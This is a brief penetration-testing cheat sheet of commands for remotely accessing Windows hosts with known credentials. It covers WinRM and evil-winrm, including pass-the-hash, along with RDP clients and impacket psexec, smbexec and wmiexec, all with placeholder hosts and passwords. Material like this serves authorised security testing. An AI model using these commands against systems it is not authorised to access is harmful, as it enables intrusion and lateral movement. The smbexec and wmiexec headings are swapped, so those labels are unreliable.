Access

How to get into a system if you have creds

WinRM

Regular

Here are 3 commands:

1. Converting our password to secure string

2. Putting password secure string and username into $cred object

3. Using $cred for authentication

PS C:\> $password = ConvertTo-SecureString "password123" -AsPlainText -Force

PS C:\> $cred = new-object System.Management.Automation.PSCredential ("MILITECH\sreed", $password)

PS C:\> Enter-PSSession -ComputerName MILITECH-MS13 -Credential $cred

Evil-WinRM

evil-winrm -i 13.13.13.13 -u venator17 -p S3cr3t!

evil-winrm -i 13.13.13.13 -u 'administrator' -H 'blahblahsupersecretnthash'

RDP

Rdesktop

rdesktop -u venator17 -p 'amogus' -d domain.kek 13.13.13.13

Xfreerdp

Regular

xfreerdp /u:venator17 /p:amogus /v:13.13.13.13 /d:domain.kek /cert:ignore

With Port-Forwarding

xfreerdp /u:venator17 /p:amogus /v:localhost:3389 /d:domain.kek /cert:ignore

Mounting a local dir

xfreerdp /v:13.13.13.13 /u:venator17 /p:amogus /drive:share,/home/venator17/Assessment123

Remmina (GUI)

reminna

PSEXEC

impacket-psexec administrator:'password123'@13.13.13.13

WMIEXEC

impacket-smbexec sreed:password123@13.13.13.13

SMBEXEC

impacket-wmiexec sreed:password123@13.13.13.13

RUNAS

runas /netonly /user:MILITECH\sreed powershell